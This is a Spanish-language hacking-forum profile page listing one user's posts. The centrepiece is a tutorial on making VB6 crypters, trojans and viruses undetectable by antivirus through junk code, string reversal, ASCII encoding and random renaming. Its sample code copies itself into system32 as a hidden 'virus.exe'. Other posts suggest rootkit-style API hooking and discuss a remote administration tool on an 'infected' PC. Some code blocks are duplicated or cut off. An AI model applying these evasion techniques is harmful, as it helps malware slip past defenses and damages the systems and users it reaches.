hola quiero saber la mayoria de las tecnicas anti ingenieria inversa, anti sandbox, Virtual box, etc
Gracias de antemano.
Gracias de antemano.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#12
Programación Visual Basic / Re: [VB6] Necesito ayuda con un tema que me tiene rebentao
30 Diciembre 2014, 01:59 AM
podrias redirigir apis de windows (una especie de rootkit) y cuando traten de hacer read o write en tu proceso denegas el acceso.
#13
Programación Visual Basic / Re: funcion al cerrar form
15 Noviembre 2014, 22:53 PM
y como vas a cerrar el form si esta oculto?
especifica...
especifica...
#14
Programación Visual Basic / Agregar junk automaticamente
14 Noviembre 2014, 21:15 PM
Hola, pues estoy haciendo un visual basic code undetector, ya tiene varias funciones pero quiero que agrege junk...
...entre cada linea, y consegui algo similar a eso, pero en todos coloca la misma cadena de caracteres, con un for genero una cadena aleatoria y estoy usando Replace() para agregar entrelineas. Pero nesesito que genere una cadena DISTINTA.
Código [Seleccionar]
GoTo auaisnda ' asi
auaisnda:
...entre cada linea, y consegui algo similar a eso, pero en todos coloca la misma cadena de caracteres, con un for genero una cadena aleatoria y estoy usando Replace() para agregar entrelineas. Pero nesesito que genere una cadena DISTINTA.
#15
Programación Visual Basic / Re: Cambiar el color de la imagen en vb6
14 Noviembre 2014, 19:47 PM
en vb6 no puedes controlar la opacidad (con un modulo tal vez, pero no creo) asi que tendrias que hacerlo con Picture1.Visible = True/Picture1.Visible = False y deberias tener muchas "mesclas" o "combinaciones" entre cada imagen y con un If comprobar la posicion de cada scroll, pero seria tedioso... 
Saludos
Saludos
#16
Programación Visual Basic / Re: Problema con codigo de visual basic
14 Noviembre 2014, 19:34 PM
Lee esto:
http://www.vbtutor.net/vb2008/vb2008_lesson8.html
Yo creo que deberia ser con un Left()
Saludos
http://www.vbtutor.net/vb2008/vb2008_lesson8.html
Yo creo que deberia ser con un Left()
Saludos
#18
Programación Visual Basic / Como indetectar un crypter, virus, stub, troyano por source VB6
14 Noviembre 2014, 17:27 PM
Empezare mostrando un pequeño code con el que explicare las tecnicas para dejarlo FUD (El code no es detectado pero enseñare el procedimiendo para dejar fud un code que sea detectado)
NOTA: No he probado todos los codes, asi que algún error me lo hacen saber
Lo primero que podemos hacer (y los mas sencillo) para quitarnos algunas firmas es agregar junk, y basicamente estamos agregando code inutil
Otra forma es invirtiendo strings
O colocando partes de string (no se si me explico) puede ser con left(), right(), o Mid()
Otro metodo es colocando los caracteren en ascii
Cambiar los nombres de los modulos y de los forms
Un metodo muy simple de la modificacion de strings, en este caso reemplaze la string ruta por wixadiaixdiawuhxdiahu
Lo mismo podemos hacer con las funciones y los subs
CODE original:
CODE con functions random:
y por ultimo compilarlo en carpetas que no tengan nombres como virus, malware, stub y cosas asi, por que al compilarlo te guarda en el exe la ruta donde fue compilado. (Ojala en C:\)
Bueno, espero que a alguien le sirva.
Saludos
NOTA: No he probado todos los codes, asi que algún error me lo hacen saber
Código [Seleccionar]
Dim ruta As String
ruta = Environ("windir") & "\system32\virus.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", ruta
Close 1#Lo primero que podemos hacer (y los mas sencillo) para quitarnos algunas firmas es agregar junk, y basicamente estamos agregando code inutil
Código [Seleccionar]
Dim ruta As String
GoTo HJNCEUHH' entre cada linea agregamos un goto "caracteres aletorios"
HJNCEUHH: ' y justo debajo los mismos caracteres aleatorios
ruta = Environ("windir") & "\system32\virus.exe"
GoTo RV87N7Ysss
RV87N7Ysss:
FileCopy App.Path & "\" & App.EXEName & ".exe", ruta
GoTo dichuwuiodcioaiofcu
dichuwuiodcioaiofcu
SetAttr ruta, vbHidden
Otra forma es invirtiendo strings
Código [Seleccionar]
Dim ruta As String
ruta = Environ("windir") & StrReverse("exe.suriv\23metsys\")' con StrReverse invertiremos strings
FileCopy App.Path & "\" & App.EXEName & StrReverse("exe."), ruta
SetAttr ruta, vbHidden
O colocando partes de string (no se si me explico) puede ser con left(), right(), o Mid()
Código [Seleccionar]
Dim ruta As String
[b]Dim extensión As String
extensión = ".exebasura"
ruta = Environ("windir") & "\system32\virus.exe"
FileCopy App.Path & "\" & App.EXEName & Left(extensión, 4), ruta 'aqui agarramos los 4 primeros caracteres de "extensión" que son .exe
SetAttr ruta, vbHidden
Otro metodo es colocando los caracteren en ascii
Código [Seleccionar]
Dim ruta As String
ruta = Environ("windir") & "\system32\virus.exe"
FileCopy App.Path & "\" & App.EXEName & Chr(46) & Chr(101) & Chr(120) & Chr(101), ruta ' .exe en ascii
SetAttr ruta, vbHidden
Open ruta For Binary As 1#
Print 1#, "VIRUSXD"
Close 1#Cambiar los nombres de los modulos y de los forms
Un metodo muy simple de la modificacion de strings, en este caso reemplaze la string ruta por wixadiaixdiawuhxdiahu
Código [Seleccionar]
Dim wixadiaixdiawuhxdiahu As String
wixadiaixdiawuhxdiahu = Environ("windir") & "\system32\virus.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", wixadiaixdiawuhxdiahu
SetAttr wixadiaixdiawuhxdiahu, vbHidden
Open wixadiaixdiawuhxdiahu For Binary As 1#
Print 1#, "VIRUSXD"
Close 1#Lo mismo podemos hacer con las funciones y los subs
CODE original:
Código [Seleccionar]
Function random(ByVal Caracteres As Long)
Dim randoms As String
For i = 1 To Caracteres
randoms = randoms & Mid("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXZ1234567890", Int((62 * Rnd) + 1), 1)
Next iCODE con functions random:
Código [Seleccionar]
Function sjudjsjjscsshudjfsj(ByVal chiuashcuhu As Long)
Dim hshdsdshdahuudau As String
For i = 1 To chiuashcuhu
hshdsdshdahuudau = hshdsdshdahuudau & Mid("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXZ1234567890", Int((62 * Rnd) + 1), 1)
Next iy por ultimo compilarlo en carpetas que no tengan nombres como virus, malware, stub y cosas asi, por que al compilarlo te guarda en el exe la ruta donde fue compilado. (Ojala en C:\)
Bueno, espero que a alguien le sirva.
Saludos
#19
Análisis y Diseño de Malware / Re: [AYUDA] Donde encontrar el virus de la policia
14 Noviembre 2014, 02:17 AM
Con un live cd de kapersky o antivirus similar se elimina facil
pero es nesesario que sea el virus de la policia???
pero es nesesario que sea el virus de la policia???
#20
Análisis y Diseño de Malware / Re: Administrador de tareas remoto VB6
13 Noviembre 2014, 20:46 PM
esque ya tengo la forma para listar los procesos en el pc "infectado" pero al enviarlos al client no se como ordenarlos, es un listbox o en que?